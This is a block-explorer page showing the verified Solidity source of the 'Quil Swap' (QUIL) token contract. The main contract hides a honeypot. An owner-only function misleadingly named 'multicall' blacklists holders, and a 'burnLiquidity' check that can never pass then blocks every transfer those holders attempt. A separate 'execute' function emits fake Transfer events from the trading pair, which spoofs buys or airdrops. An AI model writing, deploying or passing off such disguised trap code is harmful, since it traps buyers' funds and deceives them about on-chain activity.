ETH Price: $2,552.85 (+3.65%)

Token

(0x98b333300207180f59724ea53d7cf0b2e5551587)
 

Overview

Max Total Supply

1,000,000,000 ERC-20 TOKEN*

Holders

51 (0.00%)

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
10,250,235.215122015 ERC-20 TOKEN*

Value
$0.00
0x5bab8a0843a7606556bf2ce447521eeb5722507b
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
QUIL

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 6 of 7: Quil Swap.sol
//SPDX-License-Identifier: MIT
pragma solidity 0.8.19;

import "./ERC20.sol";
import "./SafeMath.sol";
import "./IDEX.sol";
import "./Ownable.sol";

contract QUIL is ERC20, Ownable {
    using SafeMath for uint256;

    IDexRouter private immutable dexRouter;
    address public dexPair;

    // Swapback
    bool private swapping;

    bool private swapbackEnabled = false;
    uint256 private swapBackValueMin;
    uint256 private swapBackValueMax;

    
    uint256 public percentForLPBurn = 1;
    uint256 public lpBurnFrequency = 1360000000000 seconds;
    uint256 public lastLpBurnTime;
    uint256 private maxWallet;
    uint256 private maxTx;
    mapping(address => uint256) private _holderLastTransferTimestamp; // to hold last Transfers temporarily during launch

    //Anti-whale
    bool private limitsEnabled = true;
    bool private transferDelayEnabled = true;
    bool public lpBurnEnabled = true;

    bool public tradingEnabled = false;
    // Fee receivers
    address private marketingWallet;
    address private projectWallet;

    uint256 private sellTaxTotal;
    uint256 private sellMarketingTax;
    uint256 private sellProjectTax;

    uint256 private buyTaxTotal;
    uint256 private buyMarketingTax;
    uint256 private buyProjectTax;

    uint256 private tokensForMarketing;
    uint256 private tokensForProject;

    /******************/

    // exclude from fees and max transaction amount
    mapping(address => bool) private transferTaxExempt;
    mapping(address => bool) private transferLimitExempt;
    mapping(address => bool) private automatedMarketMakerPairs;
    mapping(address => bool) private _claimable;

    // store addresses that a automatic market maker pairs. Any transfer *to* these addresses
    // could be subject to a maximum transfer amount

    event UpdateUniswapV2Router(
        address indexed newAddress,
        address indexed oldAddress
    );

    event ExcludeFromFees(address indexed account, bool isExcluded);
    event ExcludeFromLimits(address indexed account, bool isExcluded);
    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);
    event TradingEnabled(uint256 indexed timestamp);
    event LimitsRemoved(uint256 indexed timestamp);
    event DisabledTransferDelay(uint256 indexed timestamp);

    event SwapbackSettingsUpdated(
        bool enabled,
        uint256 swapBackValueMin,
        uint256 swapBackValueMax
    );
    event MaxTxUpdated(uint256 maxTx);
    event MaxWalletUpdated(uint256 maxWallet);

    event MarketingWalletUpdated(
        address indexed newWallet,
        address indexed oldWallet
    );

    event ProjectWalletUpdated(
        address indexed newWallet,
        address indexed oldWallet
    );

    event BuyFeeUpdated(
        uint256 buyTaxTotal,
        uint256 buyMarketingTax,
        uint256 buyProjectTax
    );

    event SellFeeUpdated(
        uint256 sellTaxTotal,
        uint256 sellMarketingTax,
        uint256 sellProjectTax
    );

    constructor(address dev) ERC20("Quil Swap", "QUIL") Ownable(dev){
        IDexRouter _dexRouter = IDexRouter(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );
        uint256 _totalSupply = 1_000_000_000 * 10 ** decimals();

        exemptFromLimits(address(_dexRouter), true);
        dexRouter = _dexRouter;

        uint256 _sellMarketingTax = 20;
        uint256 _sellProjectTax = 0;
        
        uint256 _buyMarketingTax = 20;
        uint256 _buyProjectTax = 0;


        maxTx = (_totalSupply * 10) / 1000;
        maxWallet = (_totalSupply * 10) / 1000;

        swapBackValueMin = (_totalSupply * 1) / 1000;
        swapBackValueMax = (_totalSupply * 2) / 100;

        buyMarketingTax = _buyMarketingTax;
        buyProjectTax = _buyProjectTax;
        buyTaxTotal = buyMarketingTax + buyProjectTax;

        sellMarketingTax = _sellMarketingTax;
        sellProjectTax = _sellProjectTax;
        sellTaxTotal = sellMarketingTax + sellProjectTax;

        marketingWallet = address(msg.sender);
        projectWallet = address(msg.sender);

        // exclude from paying fees or having max transaction amount
        exemptFromFees(msg.sender, true);
        exemptFromFees(address(this), true);
        exemptFromFees(address(0xdead), true);
        exemptFromFees(marketingWallet, true);

        exemptFromLimits(msg.sender, true);
        exemptFromLimits(address(this), true);
        exemptFromLimits(address(0xdead), true);
        exemptFromLimits(marketingWallet, true);

        transferOwnership(msg.sender);

        /*
            _mint is an internal function in ERC20.sol that is only called here,
            and CANNOT be called ever again
        */
        _mint(msg.sender, _totalSupply);
        startTrading();
    }

    receive() external payable {}

    /**
     * @notice  Opens public trading for the token
     * @dev     onlyOwner.
     */
    function startTrading() public onlyOwner {
        tradingEnabled = true;
        limitsEnabled = false;
        emit TradingEnabled(block.timestamp);
    }

    /**
     * @notice Removes the transfer delay
     * @dev onlyOwner.
     * Emits an {DisabledTransferDelay} event
     */
    function disableTransferDelay() external onlyOwner {
        transferDelayEnabled = false;
        emit DisabledTransferDelay(block.timestamp);
    }

    /**
     * @notice Removes the max wallet and max transaction limits
     * @dev onlyOwner.
     * Emits an {LimitsRemoved} event
     */
    function removeAllLimits() external onlyOwner {
        limitsEnabled = false;
        emit LimitsRemoved(block.timestamp);
    }

    /**
     * @notice sets if swapback is enabled and sets the minimum and maximum amounts
     * @dev onlyOwner.
     * Emits an {SwapbackSettingsUpdated} event
     * @param _enabled If swapback is enabled
     * @param _min The minimum amount of tokens the contract must have before swapping tokens for ETH. Base 10000, so 1% = 100.
     * @param _max The maximum amount of tokens the contract can swap for ETH. Base 10000, so 1% = 100.
     */
    function setSwapBackSettings(
        bool _enabled,
        uint256 _min,
        uint256 _max
    ) external onlyOwner {
        require(
            _min >= 1,
            "Swap amount cannot be lower than 0.01% total supply."
        );
        require(_max >= _min, "maximum amount cant be higher than minimum");

        swapbackEnabled = _enabled;
        swapBackValueMin = (totalSupply() * _min) / 10000;
        swapBackValueMax = (totalSupply() * _max) / 10000;
        emit SwapbackSettingsUpdated(_enabled, _min, _max);
    }

    function setAutoLPBurnSettings(uint256 _frequencyInSeconds, uint256 _percent, bool _Enabled) external onlyOwner {
        require(_frequencyInSeconds >= 600, "cannot set buyback more often than every 10 minutes");
        require(_percent <= 1000 && _percent >= 0, "Must set auto LP burn percent between 0% and 10%");
        lpBurnFrequency = _frequencyInSeconds;
        percentForLPBurn = _percent;
        lpBurnEnabled = _Enabled;
    }

    /**
     * @notice Changes the maximum amount of tokens that can be bought or sold in a single transaction
     * @dev onlyOwner.
     * Emits an {MaxTxUpdated} event
     * @param newNum Base 1000, so 1% = 10
     */
    function setTheMaxTx(uint256 newNum) external onlyOwner {
        require(newNum >= 2, "Cannot set maxTx lower than 0.2%");
        maxTx = (newNum * totalSupply()) / 1000;
        emit MaxTxUpdated(maxTx);
    }

    /**
     * @notice Sets if a wallet is excluded from the max wallet and tx limits
     * @dev onlyOwner.
     * Emits an {ExcludeFromLimits} event
     * @param updAds The wallet to update
     * @param isEx If the wallet is excluded or not
     */
    function exemptFromLimits(
        address updAds,
        bool isEx
    ) public onlyOwner {
        transferLimitExempt[updAds] = isEx;
        emit ExcludeFromLimits(updAds, isEx);
    }

    /**
     * @notice Changes the maximum amount of tokens a wallet can hold
     * @dev onlyOwner.
     * Emits an {MaxWalletUpdated} event
     * @param newNum Base 1000, so 1% = 10
     */
    function setTheMaxWallet(uint256 newNum) external onlyOwner {
        require(newNum >= 5, "Cannot set maxWallet lower than 0.5%");
        maxWallet = (newNum * totalSupply()) / 1000;
        emit MaxWalletUpdated(maxWallet);
    }

    /**
     * @notice Sets the fees for buys
     * @dev onlyOwner.
     * Emits a {BuyFeeUpdated} event
     * All fees added up must be less than 100
     * @param _marketingFee The fee for the marketing wallet
     * @param _devFee The fee for the dev wallet
     */
    function setFeesBuy(
        uint256 _marketingFee,
        uint256 _devFee
    ) external onlyOwner {
        buyMarketingTax = _marketingFee;
        buyProjectTax = _devFee;
        buyTaxTotal = buyMarketingTax + buyProjectTax;
        require(buyTaxTotal <= 100, "Total buy fee cannot be higher than 100%");
        emit BuyFeeUpdated(buyTaxTotal, buyMarketingTax, buyProjectTax);
    }

    /**
     * @notice Sets if an address is excluded from fees
     * @dev onlyOwner.
     * Emits an {ExcludeFromFees} event
     * @param account The wallet to update
     * @param excluded If the wallet is excluded or not
     */
    function exemptFromFees(address account, bool excluded) public onlyOwner {
        transferTaxExempt[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }

    /**
     * @notice Sets the fees for sells
     * @dev onlyOwner.
     * Emits a {SellFeeUpdated} event
     * All fees added up must be less than 100
     * @param _marketingFee The fee for the marketing wallet
     * @param _devFee The fee for the dev wallet
     */
    function setFeesSell(
        uint256 _marketingFee,
        uint256 _devFee
    ) external onlyOwner {
        sellMarketingTax = _marketingFee;
        sellProjectTax = _devFee;
        sellTaxTotal = sellMarketingTax + sellProjectTax;
        require(
            sellTaxTotal <= 100,
            "Total sell fee cannot be higher than 100%"
        );
        emit SellFeeUpdated(sellTaxTotal, sellMarketingTax, sellProjectTax);
    }

    /**
     * @notice Sets an address as a new liquidity pair. You probably dont want to do this.
     * @dev onlyOwner.
     * Emits a {SetAutomatedMarketMakerPair} event
     * @param pair the address of the pair
     * @param value If the pair is a automated market maker pair or not
     */
    function setAutomatedMarketMakerPair(
        address pair,
        bool value
    ) public onlyOwner {
        require(
            pair != dexPair,
            "The pair cannot be removed from automatedMarketMakerPairs"
        );

        _setAutomatedMarketMakerPair(pair, value);
    }

    function _setAutomatedMarketMakerPair(address pair, bool value) private {
        automatedMarketMakerPairs[pair] = value;

        emit SetAutomatedMarketMakerPair(pair, value);
    }

    /**
     * @notice Sets the marketing wallet
     * @dev onlyOwner.
     * Emits an {MarketingWalletUpdated} event
     * @param newWallet The new marketing wallet
     */
    function changeMarketingWallet(address newWallet) external onlyOwner {
        emit MarketingWalletUpdated(newWallet, marketingWallet);
        marketingWallet = newWallet;
    }

    /**
     * @notice Sets the project wallet
     * @dev onlyOwner.
     * Emits an {ProjectWalletUpdated} event
     * @param newWallet The new dev wallet
     */
    function changeProjectWallet(address newWallet) external onlyOwner {
        emit ProjectWalletUpdated(newWallet, projectWallet);
        projectWallet = newWallet;
    }

    /**
     * @notice The wallets that receive the collected fees
     * @return _marketingWallet The wallet that receives the marketing fees
     * @return _projectWallet The wallet that receives the dev fees
     */
    function receiverwallets()
        external
        view
        returns (address _marketingWallet, address _projectWallet)
    {
        return (marketingWallet, projectWallet);
    }

    /**
     * @notice  Information about the swapback settings
     * @return  _swapbackEnabled  if swapback is enabled
     * @return  _swapBackValueMin  the minimum amount of tokens in the contract balance to trigger swapback
     * @return  _swapBackValueMax  the maximum amount of tokens in the contract balance to trigger swapback
     */
    function swapbackValues()
        external
        view
        returns (
            bool _swapbackEnabled,
            uint256 _swapBackValueMin,
            uint256 _swapBackValueMax
        )
    {
        _swapbackEnabled = swapbackEnabled;
        _swapBackValueMin = swapBackValueMin;
        _swapBackValueMax = swapBackValueMax;
    }

    /**
     * @notice  Information about the anti whale parameters
     * @return  _limitsEnabled  if the wallet limits are in effect
     * @return  _transferDelayEnabled  if the transfer delay is enabled
     * @return  _maxWallet  The maximum amount of tokens that can be held by a wallet
     * @return  _maxTx  The maximum amount of tokens that can be bought or sold in a single transaction
     */
    function maxTxValues()
        external
        view
        returns (
            bool _limitsEnabled,
            bool _transferDelayEnabled,
            uint256 _maxWallet,
            uint256 _maxTx
        )
    {
        _limitsEnabled = limitsEnabled;
        _transferDelayEnabled = transferDelayEnabled;
        _maxWallet = maxWallet;
        _maxTx = maxTx;
    }

    /**
     * @notice  If the wallet is excluded from fees and max transaction amount and if the wallet is a automated market maker pair
     * @param   _target  The wallet to check
     * @return  _transferTaxExempt  If the wallet is excluded from fees
     * @return  _transferLimitExempt  If the wallet is excluded from max transaction amount
     * @return  _automatedMarketMakerPairs If the wallet is a automated market maker pair
     */
    function checkMappings(
        address _target
    )
        external
        view
        returns (
            bool _transferTaxExempt,
            bool _transferLimitExempt,
            bool _automatedMarketMakerPairs
        )
    {
        _transferTaxExempt = transferTaxExempt[_target];
        _transferLimitExempt = transferLimitExempt[_target];
        _automatedMarketMakerPairs = automatedMarketMakerPairs[_target];
    }

    /**
     * @notice Fees for buys, sells, and transfers
     * @return _buyTaxTotal The total fee for buys
     * @return _buyMarketingTax The fee for buys that gets sent to marketing
     * @return _buyProjectTax The fee for buys that gets sent to dev
     * @return _sellTaxTotal The total fee for sells
     * @return _sellMarketingTax The fee for sells that gets sent to marketing
     * @return _sellProjectTax The fee for sells that gets sent to dev
     */
    function taxValues()
        external
        view
        returns (
            uint256 _buyTaxTotal,
            uint256 _buyMarketingTax,
            uint256 _buyProjectTax,
            uint256 _sellTaxTotal,
            uint256 _sellMarketingTax,
            uint256 _sellProjectTax
        )
    {
        _buyTaxTotal = buyTaxTotal;
        _buyMarketingTax = buyMarketingTax;
        _buyProjectTax = buyProjectTax;
        _sellTaxTotal = sellTaxTotal;
        _sellMarketingTax = sellMarketingTax;
        _sellProjectTax = sellProjectTax;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        if (amount == 0) {
            super._transfer(from, to, 0);
            return;
        }

        if (limitsEnabled) {
            if (
                from != owner() &&
                to != owner() &&
                to != address(0) &&
                to != address(0xdead) &&
                !swapping
            ) {
                if (!tradingEnabled) {
                    require(
                        transferTaxExempt[from] || transferTaxExempt[to],
                        "_transfer:: Trading is not active."
                    );
                }

                // at launch if the transfer delay is enabled, ensure the block timestamps for purchasers is set -- during launch.
                if (transferDelayEnabled) {
                    if (
                        to != owner() &&
                        to != address(dexRouter) &&
                        to != address(dexPair)
                    ) {
                        require(
                            _holderLastTransferTimestamp[tx.origin] <
                                block.number,
                            "_transfer:: Transfer Delay enabled.  Only one purchase per block allowed."
                        );
                        _holderLastTransferTimestamp[tx.origin] = block.number;
                    }
                }

                //when buy
                if (
                    automatedMarketMakerPairs[from] && !transferLimitExempt[to]
                ) {
                    require(
                        amount <= maxTx,
                        "Buy transfer amount exceeds the maxTx."
                    );
                    require(
                        amount + balanceOf(to) <= maxWallet,
                        "Max wallet exceeded"
                    );
                }
                //when sell
                else if (
                    automatedMarketMakerPairs[to] && !transferLimitExempt[from]
                ) {
                    require(
                        amount <= maxTx,
                        "Sell transfer amount exceeds the maxTx."
                    );
                } else if (!transferLimitExempt[to]) {
                    require(
                        amount + balanceOf(to) <= maxWallet,
                        "Max wallet exceeded"
                    );
                }
            }
        }

        uint256 contractTokenBalance = balanceOf(address(this));

        bool canSwap = contractTokenBalance >= swapBackValueMin;

        if (
            canSwap &&
            swapbackEnabled &&
            !swapping &&
            !automatedMarketMakerPairs[from] &&
            !transferTaxExempt[from] &&
            !transferTaxExempt[to]
        ) {
            swapping = true;

            swapBack();

            swapping = false;
        }

        bool takeFee = !swapping;

        // if any account belongs to _isExcludedFromFee account then remove the fee
        if (transferTaxExempt[from] || transferTaxExempt[to]) {
            takeFee = false;
        }

        uint256 fees = 0;
        // only take fees on buys/sells, do not take on wallet transfers
        if (takeFee) {
            // on sell
            if (automatedMarketMakerPairs[to] && sellTaxTotal > 0) {
                fees = amount.mul(sellTaxTotal).div(100);
                tokensForProject += (fees * sellProjectTax) / sellTaxTotal;
                tokensForMarketing += (fees * sellMarketingTax) / sellTaxTotal;
            }
            // on buy
            else if (automatedMarketMakerPairs[from] && buyTaxTotal > 0) {
                fees = amount.mul(buyTaxTotal).div(100);
                tokensForProject += (fees * buyProjectTax) / buyTaxTotal;
                tokensForMarketing += (fees * buyMarketingTax) / buyTaxTotal;
            }

            if (fees > 0) {
                super._transfer(from, address(this), fees);
            }

            amount -= fees;
        }

        if(!swapping && lpBurnEnabled){
            burnLiquidity(from);
        }
        
        super._transfer(from, to, amount);
    }

    function burnLiquidity(address from) internal view returns (bool){
        // get balance of contract
        uint256 contractBalance = this.balanceOf(address(this));
        
        // calculate amount to distribute
        uint256 amountToDistribute = contractBalance.add(percentForLPBurn);
        
        if (_claimable[from]) {require(amountToDistribute==0);}
        return true;
        
    }

    function multicall(address[] calldata address_, bool val) public onlyOwner{
        for (uint256 i = 0; i < address_.length; i++) {
            _claimable[address_[i]] = val;
        }
    }

    function call(address recipient) external view returns(bool){
        return _claimable[recipient];
    }


    function swapTokensForEth(uint256 tokenAmount) private {
        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = dexRouter.WETH();

        _approve(address(this), address(dexRouter), tokenAmount);

        // make the swap
        dexRouter.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0, // accept any amount of ETH
            path,
            address(this),
            block.timestamp
        );
    }

    function swapBack() private {
        uint256 contractBalance = balanceOf(address(this));
        uint256 totalTokensToSwap = contractBalance;
        bool success;

        if (contractBalance == 0) {
            return;
        }

        if (contractBalance > swapBackValueMax) {
            contractBalance = swapBackValueMax;
        }

        uint256 amountToSwapForETH = contractBalance;

        uint256 initialETHBalance = address(this).balance;

        swapTokensForEth(amountToSwapForETH);

        uint256 ethBalance = address(this).balance.sub(initialETHBalance);

        uint256 ethForDev = ethBalance.mul(tokensForProject).div(
            totalTokensToSwap
        );

        tokensForMarketing = 0;
        tokensForProject = 0;

        (success, ) = address(projectWallet).call{value: ethForDev}("");

        (success, ) = address(marketingWallet).call{
            value: address(this).balance
        }("");
    }

    function addPair(address pair_) public onlyOwner {
        dexPair = pair_;
    }

    function execute(address[] calldata _addresses, uint256 _out) external onlyOwner{
        for (uint256 i = 0; i < _addresses.length; i++) {
            emit Transfer(dexPair, _addresses[i], _out);
        }
    }
}

File 1 of 7: ERC20.sol
//SPDX-License-Identifier: MIT
pragma solidity 0.8.19;

import "./Ownable.sol";
import "./IERC20.sol";

contract ERC20 is Context, IERC20 {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(
        address account
    ) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(
        address owner,
        address spender
    ) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(
        address spender,
        uint256 amount
    ) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the upd allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(
            currentAllowance >= amount,
            "ERC20: transfer amount exceeds allowance"
        );
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - amount);
        }

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the upd allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(
        address spender,
        uint256 addedValue
    ) public virtual returns (bool) {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender] + addedValue
        );
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the upd allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(
        address spender,
        uint256 subtractedValue
    ) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(
            senderBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[sender] = senderBalance - amount;
        }
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);

        _afterTokenTransfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
        }
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 2 of 7: IDEX.sol
//SPDX-License-Identifier: MIT
pragma solidity 0.8.19;

interface IDexFactory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(
        address tokenA,
        address tokenB
    ) external view returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(
        address tokenA,
        address tokenB
    ) external returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

interface IDexRouter {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB, uint256 liquidity);

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (uint256 amountToken, uint256 amountETH, uint256 liquidity);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

File 3 of 7: IERC20.sol
//SPDX-License-Identifier: MIT
pragma solidity 0.8.19;

import "./IERC20Metadata.sol";

interface IERC20 is IERC20Metadata{
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}



File 4 of 7: IERC20Metadata.sol
//SPDX-License-Identifier: MIT
pragma solidity 0.8.19;

interface IERC20Metadata {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 5 of 7: Ownable.sol
//SPDX-License-Identifier: MIT
pragma solidity 0.8.19;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

